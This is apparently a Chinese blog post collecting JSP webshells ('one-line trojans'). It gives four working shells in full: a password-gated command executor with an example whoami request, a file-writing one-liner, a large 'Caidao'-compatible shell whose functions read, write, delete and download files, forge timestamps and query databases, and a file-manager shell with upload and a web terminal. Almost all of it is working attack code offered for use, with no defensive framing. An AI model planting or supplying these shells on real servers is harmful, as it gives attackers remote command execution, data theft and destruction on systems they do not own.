一句话木马:JSP篇

 

JSP一句话收集:

 

1、带密码的回显cmd马

<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

请求:http://x.x.x.x/cmd.jsp??pwd=023&i=whoami

 

2、一句话

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

在浏览器地址栏输入http://192.168.125.138:8080/222.jsp?f=1.txt&t=hello123123

然后再输入http://127.0.0.1:8080/test/1.txt

 

3、jsp一句话,菜刀可直连

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!String Pwd = "pass";

    String EC(String s, String c) throws Exception {
        return s;
    }//new String(s.getBytes("ISO-8859-1"),c);}

    Connection GC(String s) throws Exception {
        String[] x = s.trim().split("\r\n");
        Class.forName(x[0].trim()).newInstance();
        Connection c = DriverManager.getConnection(x[1].trim());
        if (x.length > 2) {
            c.setCatalog(x[2].trim());
        }
        return c;
    }

    void AA(StringBuffer sb) throws Exception {
        File r[] = File.listRoots();
        for (int i = 0; i < r.length; i++) {
            sb.append(r[i].toString().substring(0, 2));
        }
    }

    void BB(String s, StringBuffer sb) throws Exception {
        File oF = new File(s), l[] = oF.listFiles();
        String sT, sQ, sF = "";
        java.util.Date dt;
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        for (int i = 0; i < l.length; i++) {
            dt = new java.util.Date(l[i].lastModified());
            sT = fm.format(dt);
            sQ = l[i].canRead() ? "R" : "";
            sQ += l[i].canWrite() ? " W" : "";
            if (l[i].isDirectory()) {
                sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
                        + "\t" + sQ + "\n");
            } else {
                sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
                        + sQ + "\n";
            }
        }
        sb.append(sF);
    }

    void EE(String s) throws Exception {
        File f = new File(s);
        if (f.isDirectory()) {
            File x[] = f.listFiles();
            for (int k = 0; k < x.length; k++) {
                if (!x[k].delete()) {
                    EE(x[k].getPath());
                }
            }
        }
        f.delete();
    }

    void FF(String s, HttpServletResponse r) throws Exception {
        int n;
        byte[] b = new byte[512];
        r.reset();
        ServletOutputStream os = r.getOutputStream();
        BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
        os.write(("->" + "|").getBytes(), 0, 3);
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.write(("|" + "<-").getBytes(), 0, 3);
        os.close();
        is.close();
    }

    void GG(String s, String d) throws Exception {
        String h = "0123456789ABCDEF";
        int n;
        File f = new File(s);
        f.createNewFile();
        FileOutputStream os = new FileOutputStream(f);
        for (int i = 0; i < d.length(); i += 2) {
            os
                    .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
                            .charAt(i + 1))));
        }
        os.close();
    }

    void HH(String s, String d) throws Exception {
        File sf = new File(s), df = new File(d);
        if (sf.isDirectory()) {
            if (!df.exists()) {
                df.mkdir();
            }
            File z[] = sf.listFiles();
            for (int j = 0; j < z.length; j++) {
                HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
            }
        } else {
            FileInputStream is = new FileInputStream(sf);
            FileOutputStream os = new FileOutputStream(df);
            int n;
            byte[] b = new byte[512];
            while ((n = is.read(b, 0, 512)) != -1) {
                os.write(b, 0, n);
            }
            is.close();
            os.close();
        }
    }

    void II(String s, String d) throws Exception {
        File sf = new File(s), df = new File(d);
        sf.renameTo(df);
    }

    void JJ(String s) throws Exception {
        File f = new File(s);
        f.mkdir();
    }

    void KK(String s, String t) throws Exception {
        File f = new File(s);
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        java.util.Date dt = fm.parse(t);
        f.setLastModified(dt.getTime());
    }

    void LL(String s, String d) throws Exception {
        URL u = new URL(s);
        int n;
        FileOutputStream os = new FileOutputStream(d);
        HttpURLConnection h = (HttpURLConnection) u.openConnection();
        InputStream is = h.getInputStream();
        byte[] b = new byte[512];
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.close();
        is.close();
        h.disconnect();
    }

    void MM(InputStream is, StringBuffer sb) throws Exception {
        String l;
        BufferedReader br = new BufferedReader(new InputStreamReader(is));
        while ((l = br.readLine()) != null) {
            sb.append(l + "\r\n");
        }
    }

    void NN(String s, StringBuffer sb) throws Exception {
        Connection c = GC(s);
        ResultSet r = c.getMetaData().getCatalogs();
        while (r.next()) {
            sb.append(r.getString(1) + "\t");
        }
        r.close();
        c.close();
    }

    void OO(String s, StringBuffer sb) throws Exception {
        Connection c = GC(s);
        String[] t = { "TABLE" };
        ResultSet r = c.getMetaData().getTables(null, null, "%", t);
        while (r.next()) {
            sb.append(r.getString("TABLE_NAME") + "\t");
        }
        r.close();
        c.close();
    }

    void PP(String s, StringBuffer sb) throws Exception {
        String[] x = s.trim().split("\r\n");
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1007);
        ResultSet r = m.executeQuery("select * from " + x[3]);
        ResultSetMetaData d = r.getMetaData();
        for (int i = 1; i <= d.getColumnCount(); i++) {
            sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
                    + ")\t");
        }
        r.close();
        m.close();
        c.close();
    }

    void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
        int i;
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1008);
        try {
            ResultSet r = m.executeQuery(q);
            ResultSetMetaData d = r.getMetaData();
            int n = d.getColumnCount();
            for (i = 1; i <= n; i++) {
                sb.append(d.getColumnName(i) + "\t|\t");
            }
            sb.append("\r\n");
            while (r.next()) {
                for (i = 1; i <= n; i++) {
                    sb.append(EC(r.getString(i), cs) + "\t|\t");
                }
                sb.append("\r\n");
            }
            r.close();
        } catch (Exception e) {
            sb.append("Result\t|\t\r\n");
            try {
                m.executeUpdate(q);
                sb.append("Execute Successfully!\t|\t\r\n");
            } catch (Exception ee) {
                sb.append(ee.toString() + "\t|\t\r\n");
            }
        }
        m.close();
        c.close();
    }%>
     
     
<%
    String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
    request.setCharacterEncoding(cs);
    response.setContentType("text/html;charset=" + cs);
    String Z = EC(request.getParameter(Pwd) + "", cs);
    String z1 = EC(request.getParameter("z1") + "", cs);
    String z2 = EC(request.getParameter("z2") + "", cs);
    StringBuffer sb = new StringBuffer("");
    try {
        sb.append("->" + "|");
        if (Z.equals("A")) {
            String s = new File(application.getRealPath(request
                    .getRequestURI())).getParent();
            sb.append(s + "\t");
            if (!s.substring(0, 1).equals("/")) {
                AA(sb);
            }
        } else if (Z.equals("B")) {
            BB(z1, sb);
        } else if (Z.equals("C")) {
            String l = "";
            BufferedReader br = new BufferedReader(
                    new InputStreamReader(new FileInputStream(new File(
                            z1))));
            while ((l = br.readLine()) != null) {
                sb.append(l + "\r\n");
            }
            br.close();
        } else if (Z.equals("D")) {
            BufferedWriter bw = new BufferedWriter(
                    new OutputStreamWriter(new FileOutputStream(
                            new File(z1))));
            bw.write(z2);
            bw.close();
            sb.append("1");
        } else if (Z.equals("E")) {
            EE(z1);
            sb.append("1");
        } else if (Z.equals("F")) {
            FF(z1, response);
        } else if (Z.equals("G")) {
            GG(z1, z2);
            sb.append("1");
        } else if (Z.equals("H")) {
            HH(z1, z2);
            sb.append("1");
        } else if (Z.equals("I")) {
            II(z1, z2);
            sb.append("1");
        } else if (Z.equals("J")) {
            JJ(z1);
            sb.append("1");
        } else if (Z.equals("K")) {
            KK(z1, z2);
            sb.append("1");
        } else if (Z.equals("L")) {
            LL(z1, z2);
            sb.append("1");
        } else if (Z.equals("M")) {
            String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
            Process p = Runtime.getRuntime().exec(c);
            MM(p.getInputStream(), sb);
            MM(p.getErrorStream(), sb);
        } else if (Z.equals("N")) {
            NN(z1, sb);
        } else if (Z.equals("O")) {
            OO(z1, sb);
        } else if (Z.equals("P")) {
            PP(z1, sb);
        } else if (Z.equals("Q")) {
            QQ(cs, z1, z2, sb);
        }
    } catch (Exception e) {
        sb.append("ERROR" + ":// " + e.toString());
    }
    sb.append("|" + "<-");
    out.print(sb.toString());
%>
View Code

 

 

 

4、小马,上传

?p=ruphy&f=

<%@page import="java.io.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.util.zip.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.util.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.lang.StringBuilder" contentType="text/html; charset=UTF-8" %>
<%@page import="java.net.URLDecoder" contentType="text/html; charset=UTF-8" %>
<%!
    void recursionZip(ZipOutputStream zipOut, File file, String baseDir) throws Exception {
        if (file.isDirectory()) {
            File[] files = file.listFiles();
            for (File fileSec : files) {
                recursionZip(zipOut, fileSec, baseDir + file.getName() + File.separator);
            }
        } else {
            byte[] buf = new byte[1024];
            InputStream input = new FileInputStream(file);
            zipOut.putNextEntry(new ZipEntry(baseDir + file.getName()));
            System.out.println(file + "压缩成功!");
            int len;
            while ((len = input.read(buf)) != -1) {
                zipOut.write(buf, 0, len);
            }
            input.close();
        }
    }
    boolean zip(String filepath, String zipPath) {
        try {
            File file = new File(filepath);// 要被压缩的文件夹
            File zipFile = new File(zipPath);
            ZipOutputStream zipOut = new ZipOutputStream(new FileOutputStream(zipFile));
            if (file.isDirectory()) {
                File[] files = file.listFiles();
                for (File fileSec : files) {
                    if (!fileSec.getAbsolutePath().equals(zipFile.getAbsolutePath()))
                        recursionZip(zipOut, fileSec, file.getName() + File.separator);
                }
            } else {
                recursionZip(zipOut, file, "");
            }
            zipOut.close();
        } catch (Exception e) {
            return false;
        }
        return true;
    }
    void copyStream(final InputStream[] ins, final JspWriter out) {
        for (final InputStream in : ins) {
            new Thread(new Runnable() {
                // @Override  不兼容低版本
                public void run() {
                    if (in == null) return;
                    try {
                        int a = -1;
                        byte[] b = new byte[2048];
                        while ((a = in.read(b)) != -1) {
                            out.println(new String(b));
                        }
                    } catch (Exception e) {
                    } finally {
                        try {
                            if (in != null) in.close();
                        } catch (Exception ec) {
                        }
                    }
                }
            }).start();
        }
    }
    String uploadFile(DataInputStream is, String path, int size, String sp) throws IOException {
        if (size > 20 * 1024 * 1024) {
            return "上传失败,文件太大!";
        }
        byte bts[] = new byte[size];
        int br = 0;
        int tbr = 0;
        //上传的数据保存在byte数组里面
        while (tbr < size) {
            br = is.read(bts, tbr, size);
            tbr += br;
        }
        String file = new String(bts, "utf-8");
        String sf = file.substring(file.indexOf("filename=\"") + 10);
        sf = sf.substring(0, sf.indexOf("\n")).replaceAll("/\\+", "/");
        sf = sf.substring(sf.lastIndexOf("/") + 1, sf.indexOf("\""));
        String fileName = path + "/" + sf;
        int pos;
        pos = file.indexOf("filename = \"");
        pos = file.indexOf("\n", pos) + 1;
        pos = file.indexOf("\n", pos) + 1;
        pos = file.indexOf("\n", pos) + 1;
        int bl = file.indexOf(sp, pos) - 4;
        //取得文件数据的开始的位置
        int startPos = ((file.substring(0, pos)).getBytes()).length;
        int endPos = ((file.substring(0, bl)).getBytes()).length;
        File checkFile = new File(fileName);
        if (checkFile.exists()) {
            checkFile.delete();
        }
        FileOutputStream fileOut = new FileOutputStream(fileName);
        fileOut.write(bts, startPos, (endPos - startPos));
        fileOut.close();
        return sf + "文件上传成功!";
    }
    String getCurrentPath(String file, String p, String url) throws IOException {
        String path = "";
        String tmpFile = file.replaceAll("/[^/]+/?$", "/");
        while (!file.equals(tmpFile)) {
            path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file.replaceAll(tmpFile, "") + "</a>" + path;
            file = tmpFile;
            tmpFile = file.replaceAll("/[^/]+/?$", "/");
        }
        path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file + "</a>" + path;
        return path;
    }
%>

<%
    //验证用户名
    String dp = "ruphy";
    response.setCharacterEncoding("UTF-8");
    String url = request.getRequestURL().toString();
    String p = request.getParameter("p");
    if (!dp.equals(p)) {
        if (!"true".equals(request.getParameter("c"))) {
            out.println("<div style='text-align: center;'>访问失败!<span style='color: red'>密码错误!</span></div>");
            out.println("<div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "?p=passwd&f=path' >" + url + "?p=passwd&f=path</a></span></div>");
            out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div>");
        }
        return;
    }
    String m = request.getParameter("m");
    if (m != null && !"".equals(m.trim())) {
        out.println("开始执行命令: " + m);
        out.flush();
        String[] cmds = new String[]{"sh", "-c", m};
        if (System.getProperty("os.name").toLowerCase().contains("windows")) {
            cmds = new String[]{"cmd", "/k", m};
        }
        Process ps = null;
        out.print("<xmp>");
        try {
            ps = Runtime.getRuntime().exec(cmds);
            copyStream(new InputStream[]{ps.getInputStream(), ps.getErrorStream()}, out);
            ps.getOutputStream().close();
            ps.waitFor();
        } catch (Exception e) {
            out.println("<div>执行命令 " + m + " 发生错误!</div>");
        } finally {
            try {
                if (ps != null) ps.destroy();
            } catch (Exception ec) {
                out.println("关闭流出错!");
            }
        }
        out.println("</xmp>");
        out.println("<div>执行命令: " + m + " 完成!</div>");
        return;
    }
    String fn = request.getParameter("f");
    if (fn == null || "".equals(fn.trim())) {
        fn = application.getRealPath("/");
    }
    String f = fn.replaceAll("\\\\+", "/").replaceAll("/+", "/");
    String ct = request.getContentType();
    if (ct != null && ct.indexOf("multipart/form-data") >= 0) {
        DataInputStream is = new DataInputStream(request.getInputStream());
        String msg = uploadFile(is, f, request.getContentLength(), ct.substring(ct.lastIndexOf("=") + 1, ct.length()));
        out.println("<script>alert('" + msg + "');location.href='" + url + "?p=" + dp + "&f=" + f + "';</script>");
        return;
    }
    File file = new File(f);
    if (!file.exists()) {
        out.println("<script>alert('输入目录或者文件不存在!')</script>");
    }
    if ("true".equals(request.getParameter("t")) && file.exists()) {
        if (zip(f, new File(f).getAbsolutePath() + ".zip")) {
            out.println("<script>alert('压缩成功!');location.href=location.href.replace(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
        }
        out.println("<script>alert('压缩失败');location.href=location.href.replace(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
        return;
    }
    if (file.isDirectory() && file.canRead()) {
        StringBuilder sb = new StringBuilder();
        File[] files = File.listRoots();
        String roots = "";
        for (int i = 0; i < files.length; i++) {
            roots += "<a style=\"margin-left: 10px;\" href=\"" + url + "?p=" + dp + "&f=" + files[i].getPath().replaceAll("\\\\+", "/") + "/\">" + files[i].getPath() + "</a>";
        }
        sb.append("<div><div>");
        sb.append("<div style='margin: 10px 0 0 20px'><form action=" + url + "?p=" + dp + "&f=" + f + " method='post' enctype='multipart/form-data'>文件上传: <input name='fileName' type='file'><input onclick='return confirm(\"上传到当前目录:" + f + "?\")' value='上传' type='submit'></form>");
        sb.append("</div><div style='margin: 5px 0 20px 20px'><span>根目录:" + roots + "</span><span style=\"margin-left: 20px;\">当前目录:" + getCurrentPath(f, dp, url) + "</span>"
                + "<span style=\"margin-left: 20px;\" ><a href=\"" + url + "?p=" + dp + "&f=" + f.replaceAll("/[^/]+/?$", "/") + "\">返回上级目录</a></span>"
                + "</div>");
        sb.append("<div style='max-height: 400px; overflow: auto; background-color: #ffe;'><table><tbody>");
        files = file.listFiles();
        for (int i = 0; i < files.length; i++) {
            if (files[i].canRead()) {
                sb.append("<tr>"
                        + "<td><a style=\"margin-left: 20px;\" href='" + url + "?p=" + dp + "&f=" + f + "/" + files[i].getName() + "'>" + files[i].getName() + "</a></td>"
                        + "<td><a style=\"margin-left: 20px;\" onclick='return confirm(\"确定删除吗?\")' href=\"" + url + "?p=" + dp + "&r=true&f=" + f + "/" + files[i].getName() + "\">删除</a></td>"
                        + (!files[i].isFile() ? "<td></td>" : "<td><a style=\"margin-left: 20px;\" onclick=\"top.document.getElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&v=true&w=true&f=" + f + "/" + files[i].getName() + "');\" href=\"#\">查看</a></td>")
                        + "<td><a style=\"margin-left: 20px;\" href=\"" + url + "?p=" + dp + "&t=true&f=" + f + "/" + files[i].getName() + "\">压缩</a>"
                        + "<span style=\"margin-left: 20px\">" + files[i].length() / 1024 + "KB(" + files[i].length() / 1024 / 1024 + "MB)</span></td>"
                        + "</tr>");
            }
        }
        sb.append("</tbody></table></div></div>");
        sb.append("<div style='background-color: #ccc;'>");
        sb.append("<div style='margin: 20px'>虚拟终端:<input id='command' type='text' value='netstat -an' style='width: 250px;border: none;color: red;background-color: black;'/>"
                + "<a style='color: blue' onclick=\"var m= top.document.getElementById('command').value;if(!m) return false; top.document.getElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&m=' + encodeURIComponent(m));\" href=\"#\">执行</a>"
                + "</div>");
        sb.append("<div style='margin-top: 20px; padding: 5px; height: 600px;max-height: 100%'>"
                + "<iframe id='view-file' src='" + url + "?c=true' height='100%' style='width: 100%; height: 100%' frameborder='0'></iframe>"
                + "</div>");
        sb.append("</div>");
        out.println(sb.toString());
        out.println("<div><div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "' >" + url + "?p=passwd</a></span></div>");
        out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div></div>");
        sb.append("</div>");
        return;
    }
    if ("true".equals(request.getParameter("r"))) {
        if (file.delete()) {
            out.println("<script>alert('删除成功!');location.href=location.href.replace(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
        }
        out.println("<script>alert('删除失败!');location.href=location.href.replace(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
        return;
    }
    if (!"true".equals(request.getParameter("v"))) {
        response.setContentType("application/octet-stream");
        response.setHeader("Content-Disposition", "attachment; filename=" + f.replaceAll(".+/+", "").replace(" ", "_"));
    } else if (file.length() > 1024 * 1024 * 10) {
        out.println("文件太大,请下载查看!");
        return;
    }
    String ctt = java.nio.file.Files.probeContentType(file.toPath());
    ctt = ctt == null ? "others" : ctt.replaceAll("\\/+.*", "");
    if ("true".equals(request.getParameter("w"))) {
        String u = url + "?p=ruphy&v=true&l=true&f=" + f;
        if ("video".equals(ctt)) {
            out.println("<div style='width: 800px'><video style='margin-top: 5px; width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>");
            return;
        }
        if ("audio".equals(ctt)) {
            out.println("<div style='width: 300px'><audio style='width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>");
            return;
        }
        if ("image".equals(ctt)) {
            out.println("<div style='width: 600px'><img style='margin-top: 5px; width:100%;' alt='非图片' src='" + u + "'/></div>");
            return;
        }
    }
    if ("true".equals(request.getParameter("l"))) {
        OutputStream streamOut = response.getOutputStream();
        InputStream streamIn = new FileInputStream(file);
        int length = streamIn.available();
        int bytesRead = 0;
        byte[] buffer = new byte[1024];
        while ((bytesRead = streamIn.read(buffer, 0, 1024)) != -1) {
            streamOut.write(buffer, 0, bytesRead);
        }
        response.flushBuffer();
        streamIn.close();
        streamOut.close();
        return;
    }
    FileInputStream fis = new FileInputStream(file);
    InputStreamReader isr = new InputStreamReader(fis, "UTF-8");
    BufferedReader br = new BufferedReader(isr);
    StringBuilder sb = new StringBuilder();
    sb.append("<xmp>\n");
    String line = null;
    while ((line = br.readLine()) != null) {
        sb.append(line);
        sb.append("\n");
    }
    sb.append("</xmp>");
    out.println(sb.toString());
    fis.close();
    isr.close();
    br.close();
%>
View Code

 

posted @ 2017-09-21 10:23  Bypass  阅读(50951)  评论(1编辑  收藏  举报